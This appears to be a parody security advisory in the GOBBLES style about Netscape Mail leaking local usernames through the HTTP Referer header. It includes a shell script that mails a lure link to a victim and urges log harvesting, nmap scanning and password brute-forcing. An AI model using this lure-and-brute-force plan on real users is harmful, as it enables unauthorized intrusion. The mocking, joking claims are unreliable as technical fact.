++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! ALERT! LAME INFORMATION LEAKAGE BUG IN NETSCAPE MAIL! ALERT! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #include "/tmp/.warez/0day/banter.h" OK GOBBLES promise to keep this advisory short because this bug is not complex like many others and is not a necessary precaution in this current advisory. Something GOBBLES have always wondered about is the different webbrowsers and why no programmers are able to program a good webbrowser that does not consume all system resources at all times. And GOBBLES also does not know why it is that no webbrowser programming teams are able to make their webbrowser products table. It is so annoying when GOBBLES is looking at he favorite websites and iexplore.exe die and all GOBBLES application close down with it! And the Mozilla (appropriately named for being such a big bloated ugly green beast) is only better because it do not kill the desktop shell when it die, but it die more frequently which is many more annoying too. And the Opera is very nice except it do not implement all the nice web features properly and can be annoying when looking at certain pay adult sites that GOBBLES are fond of! PRODUCT ******* Netscape Mail (aka nsmail) website: www.netscape.com BACKGROUND ********** GOBBLES were browsing through packetstormsecurity.org and found an interesting paper which are called "Passive System Fingerprinting using Network Client Applications" written by Jose Nazario which can be found on on GOBBLES favorite security site which is packetstormsecurity.org at http://packetstormsecurity.org/papers/protocols/passive.pdf. The idea of this paper is that information can be found when monitoring network traffic to determine information on a certain host on a network without actually making any new traffic to a host which could trigger the IDS systems. SECURITY HISTORY **************** hehehe too many to list! Go www.securityfocus.com and search for Netscape and you will see that they have a worse security history than the WUFTPD daemon! GOBBLES think you get the idea, hehehehe. Why people use software programs with such significant security history is beyond GOBBLES comprehension! If a program is knowed for having many bugs why can you trust its security when the teams do not seem to be improving on they programming abilities? VERSIONS AFFECTED ***************** All versions of Netscape Mail that the GOBBLES researchers tested seemed to be vulnerable to this attack. NOT TESTED ********** Internet Explorer, Pegasus Mail, and Eudora Mail. THE PROBLEM *********** OK here is what happen. If someone are running Netscape Mail as their mail client and they are emailed a hyperlink (GOBBLES suggest the study of RFC2817 if you do not understand these) and they click on it from inside nsmail, then the webbrowser Netscape is run. When doing the HTTP protocol negotiation with the HTTP server it will send information in the Referer (hehehe really in English the word is referrer but the hackers who wrote HTTP made mistake and made it Referer! so quit making fun of GOBBLES English when you know you do not have the brave enough to mock the authors of HTTP!) field which contains the full pathnames to the users account on the system. So on a *nix system it will show /home/username/.netscape/nsmail (or /usr/home/username/.netscape/nsmail depending on your flavor HEHEHE or the many other pathnames that it might be) and on a Windows system it will show C:\Program Files\Netscape\Users\username\mail. Now you ask GOBBLES, "GOBBLES how is this a vulnerability?" Very simple young grasshooper! Because we also get the IP of the person who is viewing the html document! Then you can know at least one username on their system and then we have an expanded window of attack on the system since now we may begin attempting to bruteforce their passwords on the system! Letting outside world know the names of your users on the system like that is never a good thing because it allows the bruteforce password hacking exploits to be used on your systems! EXPLOIT DETAILS *************** GOBBLES have provided a full working POC (proof of concept) exploit for this problem so that you can better understand it yourself. It requires that you edit the sourcecode to make it work though hehehe so it prevents some people from maliciously abusing it! Here are the exploit! ----------------------------cut here------------------------------------- #!/bin/sh # PROOF OF CONCEPT EXPLOIT FOR THE INFORMATION LEAK VULNERABILITY # IN NETSCAPE MAIL (NSMAIL) DISCOVERED BY GOBBLES OF THE GOBBLES # SECURITY RESEARCH TEAM. THIS EXPLOIT HAS BEEN FULLY DISCLOSED # BUT SHOULD NOT BE USED FOR ANY MALICIOUS PURPOSES. IT WILL NOT # WORK WITH OUT SOME MODIFICATIONS SO IT IS REQUIRED THAT THE # PERSON USING IT HAS SOME KNOWLEDGE OF SHELL SCRIPTING. THIS WILL # MAKE IT ONLY WORK FOR THE PENTESTERS WHO CAN APPRECIATE THE # GOODNESS OF THIS EXPLOIT AND SHOULD HOPEFULLY PREVENT IT FROM # BEING USED BY PEOPLE WITH MALICIOUS INTENTIONS! ENJOY! # LOVE, # GOBBLES # ok, phase one, creating our payload! /usr/bin/clear echo '[*] EXPLOIT FOR NETSCAPE MAIL [*]' echo '[*] written by GOBBLES [*]' echo '[*] ABUSE IT AND YOU LOSE IT! [*]' echo '[*] step one: create letter!! [*]' umask 077 cat << _GOBBLES_ >/tmp/evil-letter Hi Friend, please visit my new website at http://www.somesitethatismonitored.com/monitoredhtml.html and let me know what you think! Thank you friend! Love, GOBBLES http://www.bugtraq.org GOBBLES@hushmail.com _GOBBLES_ echo '[*] ok now phase one complete! [*]' echo '[*] ok now on to phase two! [*]' echo '[*] step two: sending email ;) [*]' cat /tmp/evil-letter | /bin/mail victim@suspectedNSMAILuser.com echo '[*] ok, step two now all done! [*]' echo '[*] now cleaning up our mess!! [*]' rm -rf /tmp/evil-letter echo '[*] Cleanup all complete now!! [*]' echo '[*] To complete process wait [*]' echo '[*] for the victim to click on [*]' echo '[*] the link then check your [*]' echo '[*] http logs for the username [*]' echo '[*] and IP then use your nmap [*]' echo '[*] to find what the computer [*]' echo '[*] is running then try to [*]' echo '[*] bruteforce your way in!!!! [*]' echo '[*] heheheh HAVE A LOT OF FUN! [*]' echo '[*] LOVE, [*]' echo '[*] GOBBLES [*]' echo '[*] http://www.bugtraq.org [*]' echo '[*] GOBBLES@hushmail.com [*]' ----------------------------now cut here--------------------------------- VENDOR NOTIFICATION STATUS ************************** GOBBLES Team did decide not to bother letting the Netscape programmers know about this problem before our full disclosure of the bug. Before you use this as a reason to start writing nasty email to GOBBLES about this action you need to consider the why we did it which is because we believe that the Netscape programmers are not too considerate about the security of their software anyways since there are always so many bugs in them being disclosed. They do sloppy work and sloppy work should not receive any special attention other than scorn which is what you should be feeling to them right now. SUGGESTED WORKAROUNDS ********************* Until the Netscape people can make a fix for this GOBBLES and friends have a few suggestions as to how you might work around this bug. [1] Use a better mail client like Pine or Elm or mutt or mailx. [2] Use web-based services to retrieve and view your email. Microsoft's Hotmail works good for this http://www.hotmail.com. [3] Do not use your Netscape Mail anymore until the problem is fixed. GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon (the one and only true william shakespeare), bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, goverment boy, ralph lauren (clothing designer to the true hackers), and all our friends and family. oh yeah and a P.S. from GOBBLES! ps: is Lady Caroline from the Cult of the Dead Cows the same person as Caroline Meinel from happyhacker.org? GOBBLES is only curious and if you can confirm our suspicions please email us ASP!